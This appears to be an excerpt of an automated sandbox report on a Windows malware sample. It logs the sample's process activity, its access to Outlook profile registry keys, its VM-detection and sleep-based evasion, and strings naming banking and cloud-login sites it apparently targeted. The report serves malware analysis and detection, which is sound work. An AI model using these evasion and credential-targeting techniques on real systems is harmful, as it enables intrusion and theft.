                Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\explorer.exeSection loaded: starttiledata.dll
                Source: C:\Windows\explorer.exeSection loaded: idstore.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Windows\explorer.exeSection loaded: wlidprov.dll
                Source: C:\Windows\explorer.exeSection loaded: samcli.dll
                Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\explorer.exeSection loaded: policymanager.dll
                Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dll
                Source: C:\Windows\SysWOW64\where.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\where.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: N4533DWG.exeStatic file information: File size 1183744 > 1048576
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: N4533DWG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: where.pdbGCTL source: svchost.exe, 00000002.00000003.1543237026.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000003.1531788230.0000000000824000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: where.pdb source: svchost.exe, 00000002.00000003.1543237026.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000003.1531788230.0000000000824000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: N4533DWG.exe, 00000000.00000003.1267315708.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, N4533DWG.exe, 00000000.00000003.1263752332.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1468172730.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466177797.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1575884239.00000000046F4000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1578369513.00000000048A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: N4533DWG.exe, 00000000.00000003.1267315708.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, N4533DWG.exe, 00000000.00000003.1263752332.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1575774016.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1468172730.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466177797.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1575884239.00000000046F4000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1578369513.00000000048A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: where.exe, 0000000A.00000002.2255228897.000000000507C000.00000004.10000000.00040000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1860175144.00000000156AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: where.exe, 0000000A.00000002.2255228897.000000000507C000.00000004.10000000.00040000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1860175144.00000000156AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ICpHO9L5D6CxaaNC.exe, 00000009.00000002.2527413628.0000000000F7F000.00000002.00000001.01000000.00000005.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2525384756.0000000000F7F000.00000002.00000001.01000000.00000005.sdmp
                Source: N4533DWG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: N4533DWG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: N4533DWG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: N4533DWG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: N4533DWG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0038C104 LoadLibraryA,GetProcAddress,0_2_0038C104
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0031C590 push eax; retn 0031h0_2_0031C599
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00338AC5 push ecx; ret 0_2_00338AD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040224F push edx; iretd 2_2_0040225F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407222 push ebp; iretd 2_2_00407238
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004142F3 push ds; retf 2_2_00414325
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA80 push esi; ret 2_2_0041AA81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411AA8 push edi; ret 2_2_00411ABA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411AB3 push edi; ret 2_2_00411ABA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403340 push eax; ret 2_2_00403342
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004193E7 push F8DE67B8h; ret 2_2_004193EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004145E1 push 0000005Eh; iretd 2_2_004145E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417757 push ds; retf 2_2_00417759
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004177B4 push esp; retf 2_2_004177BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0283D push eax; iretd 2_2_02F02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F01368 push eax; iretd 2_2_02F01369
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00314A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00314A35
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_003953DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003953DF
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00333307 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00333307
                Source: C:\Users\user\Desktop\N4533DWG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\N4533DWG.exeAPI/Special instruction interceptor: Address: 20431F4
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD324
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD7E4
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD944
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD504
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD544
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CD1E4
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105D0154
                Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF9105CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Windows\SysWOW64\where.exeWindow / User API: threadDelayed 9741Jump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\where.exe TID: 7412Thread sleep count: 231 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\where.exe TID: 7412Thread sleep time: -462000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\where.exe TID: 7412Thread sleep count: 9741 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\where.exe TID: 7412Thread sleep time: -19482000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\ICpHO9L5D6CxaaNC.exe TID: 7432Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037449B
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037C75D FindFirstFileW,FindClose,0_2_0037C75D
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C7E8
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F021
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F17E
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F47F
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00373833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373833
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00373B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B56
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BD48
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00314AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00314AFE
                Source: explorer.exe, 00000010.00000003.2277529468.000000000771C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Pro*T
                Source: CLp00JCM5.10.drBinary or memory string: discord.comVMware20,11696487552f
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BDE7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BDE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: explorer.exe, 0000001B.00000002.2458110110.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: CLp00JCM5.10.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: explorer.exe, 00000020.00000002.2525034811.0000000000523000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: CLp00JCM5.10.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2323207163.000000000BE29000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2419561951.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009D5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425824427.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425017328.0000000009D5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2467271837.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2427058556.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2467271837.0000000009D5E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2417427782.0000000009CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: CLp00JCM5.10.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: CLp00JCM5.10.drBinary or memory string: global block list test formVMware20,11696487552
                Source: CLp00JCM5.10.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BE81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTnaVMWare
                Source: explorer.exe, 0000001B.00000003.2372826589.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
                Source: explorer.exe, 0000001B.00000002.2467271837.0000000009D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
                Source: CLp00JCM5.10.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: explorer.exe, 00000010.00000002.2362300597.00000000079E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\machine.inf_loc
                Source: explorer.exe, 0000001B.00000002.2458110110.0000000007C42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: CLp00JCM5.10.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: CLp00JCM5.10.drBinary or memory string: dev.azure.comVMware20,11696487552j
